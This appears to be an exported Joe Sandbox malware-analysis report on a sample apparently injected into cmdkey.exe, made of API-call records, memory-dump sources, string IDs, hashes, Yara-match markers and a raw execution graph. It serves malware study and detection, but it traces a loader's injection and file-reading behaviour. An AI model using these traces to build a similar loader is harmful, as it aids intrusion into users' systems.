• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3751793516-0
                                                                                                                                                                                                                                                                • Opcode ID: d48e94294e09c64e75ce65a3089d1a64d1edb5c6cce1281c45e4b49c5f9df717
                                                                                                                                                                                                                                                                • Instruction ID: baf4b22be7c240c0249859998ea5247985aaf7e7583e011f11e43f36ca2efb08
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d48e94294e09c64e75ce65a3089d1a64d1edb5c6cce1281c45e4b49c5f9df717
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45112531908150ABEB113F755D449AF37B0EA66365728473BF491B22E2C23C0D42962E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                                                                                                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                                                                                                                                                                                • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1404258612-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,00000000,00402DA5,00000001), ref: 00402BD8
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402BF6
                                                                                                                                                                                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C21
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • kLsE, xrefs: 339005FE
                                                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33900586
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404E1F
                                                                                                                                                                                                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404E70
                                                                                                                                                                                                                                                                  • Part of subcall function 00403ECB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EDD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405865
                                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 0040587F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B028,Error launching installer), ref: 00405369
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405376
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405357
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(004059B6,00000000), ref: 004057AF
                                                                                                                                                                                                                                                                • CharNextA.USER32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.9%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                                                                                                                                                Signature Coverage:0.6%
                                                                                                                                                                                                                                                                Total number of Nodes:469
                                                                                                                                                                                                                                                                Total number of Limit Nodes:73
84457->84454 84459 3028b6d 84458->84459 84481 38f2b2a 84459->84481 84460 301b4cd 84460->84427 84460->84431 84464 3015c4e 84462->84464 84484 3028d20 84462->84484 84464->84438 84465->84440 84467 3028740 84466->84467 84469 30286ee 84466->84469 84490 38f38d0 LdrInitializeThunk 84467->84490 84468 3028765 84468->84442 84469->84442 84472 30287ed 84471->84472 84474 302879b 84471->84474 84491 38f4260 LdrInitializeThunk 84472->84491 84473 3028812 84473->84444 84474->84444 84477 302894d 84476->84477 84479 30288fb 84476->84479 84492 38f2ed0 LdrInitializeThunk 84477->84492 84478 3028972 84478->84446 84479->84446 84482 38f2b3f LdrInitializeThunk 84481->84482 84483 38f2b31 84481->84483 84482->84460 84483->84460 84485 3028dd4 84484->84485 84487 3028d52 84484->84487 84489 38f2c30 LdrInitializeThunk 84485->84489 84486 3028e19 84486->84464 84487->84464 84489->84486 84490->84468 84491->84473 84492->84478 84726 3020eee 84727 3020ecc 84726->84727 84728 3020f0f 84727->84728 84731 30164a0 84727->84731 84732 30164c5 84731->84732 84735 3028e70 84732->84735 84736 3028e8a 84735->84736 84739 38f2b80 LdrInitializeThunk 84736->84739 84737 3016539 84739->84737 84740 3009af0 84742 3009aff 84740->84742 84741 3009b40 84742->84741 84743 3009b2d CreateThread 84742->84743 84744 301f970 84745 301f9d4 84744->84745 84746 3016390 2 API calls 84745->84746 84748 301fb07 84746->84748 84747 301fb0e 84748->84747 84749 30164a0 LdrInitializeThunk 84748->84749 84751 301fb8a 84749->84751 84750 301fcb3 84751->84750 84752 301fcc2 84751->84752 84773 301f750 84751->84773 84753 3029500 NtClose 84752->84753 84755 301fccc 84753->84755 84756 301fbc6 84756->84752 84757 301fbd1 84756->84757 84758 302b6b0 RtlAllocateHeap 84757->84758 84759 301fbfa 84758->84759 84760 301fc03 84759->84760 84761 301fc19 84759->84761 84762 3029500 NtClose 84760->84762 84782 301f640 CoInitialize 84761->84782 84764 301fc0d 84762->84764 84765 301fc27 84785 3028fc0 84765->84785 84767 301fca2 84768 3029500 NtClose 84767->84768 84769 301fcac 
84768->84769 84770 302b5d0 RtlFreeHeap 84769->84770 84770->84750 84771 301fc45 84771->84767 84772 3028fc0 LdrInitializeThunk 84771->84772 84772->84771 84774 301f76c 84773->84774 84775 3014620 LdrLoadDll 84774->84775 84777 301f78a 84775->84777 84776 301f793 84776->84756 84777->84776 84778 3014620 LdrLoadDll 84777->84778 84779 301f85e 84778->84779 84780 3014620 LdrLoadDll 84779->84780 84781 301f8b8 84779->84781 84780->84781 84781->84756 84784 301f6a5 84782->84784 84783 301f73b CoUninitialize 84783->84765 84784->84783 84786 3028fdd 84785->84786 84789 38f2ac0 LdrInitializeThunk 84786->84789 84787 302900d 84787->84771 84789->84787 84790 3025970 84791 30259d2 84790->84791 84793 30259df 84791->84793 84794 30174b0 84791->84794 84795 3017477 84794->84795 84796 301b3b0 9 API calls 84795->84796 84797 30174a2 84795->84797 84796->84797 84797->84793 84798 302c7f0 84799 302b5d0 RtlFreeHeap 84798->84799 84800 302c805 84799->84800 84801 3020270 84802 302028d 84801->84802 84803 3014620 LdrLoadDll 84802->84803 84804 30202ab 84803->84804 84493 3012838 84494 301284c 84493->84494 84497 3016390 84494->84497 84496 3012863 84499 30163c3 84497->84499 84498 30163e7 84498->84496 84499->84498 84504 3029070 84499->84504 84501 301640a 84501->84498 84502 3029500 NtClose 84501->84502 84503 301648a 84502->84503 84503->84496 84505 302908d 84504->84505 84508 38f2bc0 LdrInitializeThunk 84505->84508 84506 30290b9 84506->84501 84508->84506 84509 3019d3f 84510 3019d56 84509->84510 84512 3019d5b 84509->84512 84511 3019d8d 84512->84511 84513 302b5d0 RtlFreeHeap 84512->84513 84513->84511 84805 38f29f0 LdrInitializeThunk

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #W$)/$,$8$8$?ypG$B$CI$N$Vw$Yg$ZA$^^$_$a$cW$l\$pG$wN${p$q
                                                                                                                                                                                                                                                                • API String ID: 0-914735403
                                                                                                                                                                                                                                                                • Opcode ID: 06a8c76f896d870c9f877d233b19a329f37458c3a54a4963bb31ccbd0d242df1
                                                                                                                                                                                                                                                                • Instruction ID: 472f4a8963dbe3282f368f92a199a82b3f55cc201f1746d543dd0f29a594eb9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06a8c76f896d870c9f877d233b19a329f37458c3a54a4963bb31ccbd0d242df1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3328EB0E06228CBEB64CF88C994BDDBBB1BB44308F1485DAD50D6B291C7B55AC9CF54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C7F4
                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0301C82F
                                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 0301C83A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                • Opcode ID: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                                                                                                                                                                                                                                • Instruction ID: 69475a6270bf7849dcf3bb08eb0f4032a9f783cf68aa7b36a700aa79b1af1fa3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac8801ece7700f1a3c013b012581bab5bd498beee54a32e0a4f61266fc43e11f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F31B675901348BBEB24DF60CC85FFF77BCAB84704F144459B908AB180DAB0EA95CBA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?,?,?), ref: 03029301
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                • Opcode ID: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                                                                                                                                                                                                                                • Instruction ID: affe066e7b9f638572a82935cf45bec6fa03ffb9b9680c36a5049fdf4edb89a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb9cc546ed493f20ed36a4ab2e9223a943d12665cbcef7ff238bf32946d0558
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A31D8B5A01608AFDB14DF98C880EDEB7F9EF8C314F108219F919A7340D730A851CBA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,48BBEA40,?,?), ref: 03029456
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                • Opcode ID: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                                                                                                                                                                                                                                • Instruction ID: 5d76b4e2c254010c9fd24d5c6f831370294178c68da58fd9e7b66884fdb54ef1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431CA75A01648AFDB14DF98C840EEF77F9EF88714F108219F919AB344D734A911CBA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(03011E3E,?,0302813F,00000000,00000004,00003000,?,?,?,?,?,0302813F,03011E3E), ref: 03029738
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                • Opcode ID: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                                                                                                                                                                                                                                • Instruction ID: 0e545728ce4a4a9f240e5daee8a90ab2075fa9465c42c04d6c8c207aba84d267
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84211CB9A01718AFDB14DF98CC41EEF77B9EF88700F108109F918AB240D734A911CBA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03029534
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
